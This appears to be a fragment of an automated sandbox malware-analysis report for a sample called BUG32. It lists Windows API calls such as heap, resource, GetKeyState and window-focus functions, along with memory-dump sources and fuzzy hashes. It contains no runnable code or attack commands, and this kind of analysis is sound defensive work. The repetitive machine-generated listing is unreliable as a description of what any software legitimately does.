                            • RtlReAllocateHeap.NTDLL(00000008,?,?,-000003FF,?,?,00402874,-000003FE,00410350,?,\BDFINOPS,00000000,?,?,?,0040F021), ref: 0040CC8A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 47fab04d12e9573dd796bfd81d942792d33c5f41428516c19d0de12252ddadf1
                            • Instruction ID: 8843eaf85d35806d14ddaa9458e0a395bf37254e5592e95cb4d1b4e2c8b53df7
                            • Opcode Fuzzy Hash: 47fab04d12e9573dd796bfd81d942792d33c5f41428516c19d0de12252ddadf1
                            • Instruction Fuzzy Hash: 4521B036204B01CFD331CF99C9C085AB3E4EB553047114B7EE49ABBAA2C334E8499B64
                            APIs
                            • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00001000,?,0040AB30,00001000,00000000,0040F1F8,?,0040AA5C,00000000,00000000,0040F1F8), ref: 0040A665
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 7745c8716557b5834da7dd3a14ee7bed9be494ab97b0cdeb0670903a598cf5eb
                            • Instruction ID: e777165dbbaaec21fa6e8e3b5900f4d71f98385e5ec1c006118ee0b0c96bc6cf
                            • Opcode Fuzzy Hash: 7745c8716557b5834da7dd3a14ee7bed9be494ab97b0cdeb0670903a598cf5eb
                            • Instruction Fuzzy Hash: 95E0AEB6514700AFC324CF68C948C67B7E8EB88610B00CD2EE49A93A10E630F840CB61
                            APIs
                            • GetNativeSystemInfo.KERNEL32(00000000,00000000), ref: 00402C1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: InfoNativeSystem
                            • String ID:
                            • API String ID: 1721193555-0
                            • Opcode ID: e9a46e6b25b61da14a714cc89f43e63446f2737aa938eb147169a4fb147e552f
                            • Instruction ID: d2cf8231f69bfa66d2af8c33dd1a9df68f332263cc4df88b6a4dc9746081d979
                            • Opcode Fuzzy Hash: e9a46e6b25b61da14a714cc89f43e63446f2737aa938eb147169a4fb147e552f
                            • Instruction Fuzzy Hash: CED05EA040C24C46EB34BBA4D50879F72E8E740304F908C3AD485962C0F3BCDAD9C64B
                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401067,00000000,00001000,00000000,00000000), ref: 0040A1C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: eb9378fca89ceff508920609d0fccd64fdd8fe08d02cfe81a18a670ded090a6c
                            • Instruction ID: 00db3448da17f74cdaf1addb5d32a913b1a27baf7bd7a33226f4e4a640c69762
                            • Opcode Fuzzy Hash: eb9378fca89ceff508920609d0fccd64fdd8fe08d02cfe81a18a670ded090a6c
                            • Instruction Fuzzy Hash: 5FB0127028130056E3704B209C06B4035509304B43F204030B644A91E4C6F020804E0D
                            APIs
                            • HeapDestroy.KERNELBASE(00BE0000,00401D79,00401D37,00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200), ref: 0040A1E6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: DestroyHeap
                            • String ID:
                            • API String ID: 2435110975-0
                            • Opcode ID: 6081b24a773eeecb2724761780c82a0349c6806a853ccd251b7ab3f4dbff0fd1
                            • Instruction ID: 631d9d2485b99b0b7556156f95b0e917c8d7344286f652ade8fdca357da980cf
                            • Opcode Fuzzy Hash: 6081b24a773eeecb2724761780c82a0349c6806a853ccd251b7ab3f4dbff0fd1
                            • Instruction Fuzzy Hash: B6A00271900604ABCF90DFE4EE4C85937A8F74C3017108870B115D3470C675A445CF18
                            APIs
                            • FreeLibrary.KERNELBASE(00401D60,00401D37,00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200), ref: 00409915
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: e18f32589a58ab24ead4acf6b0cdbb60c44981e611668287efad4060b3550e4f
                            • Instruction ID: 8723ec9f328039f2c0d1e7f5cf5be3f0c6c686e1829604aeaca6453c8d4e4e2b
                            • Opcode Fuzzy Hash: e18f32589a58ab24ead4acf6b0cdbb60c44981e611668287efad4060b3550e4f
                            • Instruction Fuzzy Hash: 18900230401001AFCE11AF10EF098443F66B75070171044B0900161470CB726455DE18
                            APIs
                            • KiUserCallbackDispatcher.NTDLL(00401D74,00401D37,00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200), ref: 0040AFC4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CallbackDispatcherUser
                            • String ID:
                            • API String ID: 2492992576-0
                            • Opcode ID: d519ecaad380596525dc6b55d251e8928fb5a5a96e1f05b6b471b530a91a56bb
                            • Instruction ID: 5cbf0f7b1dd6169d07783514cfd20b0b870f93a13ab2f217feddf7ed42a66aa8
                            • Opcode Fuzzy Hash: d519ecaad380596525dc6b55d251e8928fb5a5a96e1f05b6b471b530a91a56bb
                            • Instruction Fuzzy Hash: 509002304011058FCF115B20FE08AC43F61E74030172185B0902191470C6725499EE08
                            APIs
                            • GetFocus.USER32 ref: 004096C7
                            • GetKeyState.USER32(00000009), ref: 004096DD
                            • GetKeyState.USER32(00000011), ref: 004096E5
                            • GetKeyState.USER32(00000010), ref: 004096ED
                            • GetKeyState.USER32(00000012), ref: 004096F5
                            • GetClassNameA.USER32(00000000,?,00000005), ref: 00409703
                            • strncmp.MSVCRT(?,Rich,00000004,?,?,00000000,00000000,0040F1F8,00000007,00000000,00001000), ref: 00409715
                            • SendMessageA.USER32(00000000,0000044E,00000000,00000000), ref: 00409729
                            • GetKeyState.USER32(00000011), ref: 00409748
                            • GetKeyState.USER32(00000010), ref: 00409750
                            • GetKeyState.USER32(00000012), ref: 00409758
                            • GetPropA.USER32(00000000,PB_Hotkey), ref: 00409776
                            • GetPropA.USER32(?,PB_WindowID), ref: 00409782
                            • GetWindowThreadProcessId.USER32(?,?), ref: 00409790
                            • GetCurrentProcessId.KERNEL32(?,?,?,00000000,00000000,0040F1F8,00000007,00000000,00001000), ref: 0040979A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: State$ProcessProp$ClassCurrentFocusMessageNameSendThreadWindowstrncmp
                            • String ID: PB_Hotkey$PB_WindowID$Rich
                            • API String ID: 1107629356-1791564756
                            • Opcode ID: 873b1d1864a40793207218f6f8323a88ef19eebe82329182b0742979cbca0282
                            • Instruction ID: a2ca817d34066fb1406ef517ee6a6fa526141ec6a9fcb3d17a49058e6493c1f3
                            • Opcode Fuzzy Hash: 873b1d1864a40793207218f6f8323a88ef19eebe82329182b0742979cbca0282
                            • Instruction Fuzzy Hash: B021A232A51319EAEA206F615D41F6B3B989F50B80F08443BFD40B72C3D7799C0995BA
                            APIs
                            • GetPropA.USER32(?,PB_WindowID), ref: 00408E90
                            • GetParent.USER32(?), ref: 00408E9F
                            • GetPropA.USER32(?,PB_Focus), ref: 00408F71
                            • SetFocus.USER32(00000000), ref: 00408F7C
                            • GetFocus.USER32 ref: 00408F90
                            • SetPropA.USER32(?,PB_Focus,00000000), ref: 00408F9F
                              • Part of subcall function 0040967A: SendMessageA.USER32(00000001,00000129,00000000,00000000), ref: 00409691
                              • Part of subcall function 0040967A: SendMessageA.USER32(00000000,00000128,00030001,00000000), ref: 004096B9
                            • GetClientRect.USER32(?,?), ref: 00409098
                            • FillRect.USER32(?,?,?), ref: 004090A6
                            • RemovePropA.USER32(?,PB_Focus), ref: 00409104
                            • GetWindowLongA.USER32(?,000000EC), ref: 00409145
                            • EnumChildWindows.USER32(?,Function_00008E4F,00000000), ref: 004091A2
                            • GetWindowLongA.USER32(?,000000F4), ref: 004091CF
                            • PostMessageA.USER32(?,00000000,00000000,00000000), ref: 00409326
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Prop$Message$FocusLongRectSendWindow$ChildClientEnumFillParentPostRemoveWindows
                            • String ID: PB_Focus$PB_WindowID
                            • API String ID: 45775309-3744720988
                            • Opcode ID: 3a5849b30d4ad79de74b10755e6bac6546f099b8834710af1d9aacc7325d128a
                            • Instruction ID: ae2b5a7dc531791c0894683133a9ab9b6a57b00d3261b7680baa094d52a97074
                            • Opcode Fuzzy Hash: 3a5849b30d4ad79de74b10755e6bac6546f099b8834710af1d9aacc7325d128a
                            • Instruction Fuzzy Hash: 8FD10131A00205FBEB319F95CD49EAF7A64EB08740F14413BF9057A2D2C7798E51EB9A
                            APIs
                            • FindResourceA.KERNEL32(0040F208,00000000,0000000A), ref: 00402C5D
                            • LoadResource.KERNEL32(00410350,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004012F4,OPS,00000000,00000000,00000008,00000000,0040F200), ref: 00402C75
                            • SizeofResource.KERNEL32(00410350,00000000,00410350,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004012F4,OPS,00000000,00000000,00000008), ref: 00402C87
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Resource$FindLoadSizeof
                            • String ID: BDFINOPS
                            • API String ID: 507330600-2062032947
                            • Opcode ID: 0ad942fb6397e843221061cc987cab7597e29ce9fbcb247d7f3aa08100a37d42
                            • Instruction ID: 618491fe0f8fd17a6d9b025c298e4a39d9fa73c33d5d1b00898f1e43c6d8d064
                            • Opcode Fuzzy Hash: 0ad942fb6397e843221061cc987cab7597e29ce9fbcb247d7f3aa08100a37d42
                            • Instruction Fuzzy Hash: FE21297110C301EFD711AF20EA85A1EB7E1EB94718F10893EF188662E1C77A8C549B5A
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(004074D0,004011EB,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200,00000008,00000401,00000007,0040F208), ref: 0040754C
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,004011EB,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200,00000008,00000401,00000007,0040F208), ref: 00407560
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 5574c1dd837b12a27297cf813d34ac0d6f8cf27c1f9a6bfd70aeac14151c85d5
                            • Instruction ID: e4e447744bf46e3b32e5fc230fabc1d739005c31dabad6730c0f92b772cdb482
                            • Opcode Fuzzy Hash: 5574c1dd837b12a27297cf813d34ac0d6f8cf27c1f9a6bfd70aeac14151c85d5
                            • Instruction Fuzzy Hash: E3F039F0908700EFD710CF34ED48B867BE4A748B00F00C93AA824D36A0D3B5D885DB1A
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,00401D51,00401D37,00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200), ref: 00407666
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: a786e6a4e1f6e307804be11e4e6ed0966ad38835ca8df00e4bf414a2a87a3083
                            • Instruction ID: df20551030a509e6cfd80f19f057d6d7c829f1ae7b22c569ff5bdb35ee91212b
                            • Opcode Fuzzy Hash: a786e6a4e1f6e307804be11e4e6ed0966ad38835ca8df00e4bf414a2a87a3083
                            • Instruction Fuzzy Hash: 98B012B4040704CBE7408F70EC4CBC03764B308B00F808530AC30C2130C3B940C4CB08
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c90969fd2af6dc75122633ead90910649dbbc103ae972452c6efa20bc59572f3
                            • Instruction ID: 2f82ec288464bff6e31d2215d3da2bc8127c66043d8ce5e83ca6a2b57886bfec
                            • Opcode Fuzzy Hash: c90969fd2af6dc75122633ead90910649dbbc103ae972452c6efa20bc59572f3
                            • Instruction Fuzzy Hash: 9F12D3BBA557124BD708CA59CC80295B3E3BBC8364B1F913DD959D3305EEB9BA0B46C0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 19d269216a97b0f666c0e572380239e4773acdb782a01c4ce428aa4136646189
                            • Instruction ID: a08d2d0c7a0753a368389e2028246d942c81c420e7684f520b3cbe9ef643c48e
                            • Opcode Fuzzy Hash: 19d269216a97b0f666c0e572380239e4773acdb782a01c4ce428aa4136646189
                            • Instruction Fuzzy Hash: 2A12B2BBA557124BD708CA59CC80295B3E3BBC8364B1F913DD959D3305EEB9BA0B46C0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                            • Instruction ID: 49f4912292643e3f7ef51ebb199e2b5942b696362d4dc95e630eca87fc3c1b97
                            • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                            • Instruction Fuzzy Hash: 4081A471604B018FC728CF2CD8906AAB7E1EFD5314F14892DD4EA87792D738E89ACB54
                            APIs
                            • GetActiveWindow.USER32 ref: 0040957B
                            • GetFocus.USER32 ref: 00409584
                            • IsChild.USER32(00000001,00000000), ref: 0040959B
                            • GetClassNameA.USER32(00000000,?,00000032), ref: 004095B5
                            • strcmp.MSVCRT ref: 004095C4
                            • strcmp.MSVCRT ref: 004095E4
                            • GetWindowLongA.USER32(00000000,000000F0), ref: 004095F2
                            • GetParent.USER32(00000000), ref: 00409616
                            • EnumChildWindows.USER32(00000001,0040951C,?), ref: 00409638
                            • SetFocus.USER32(?), ref: 0040964B
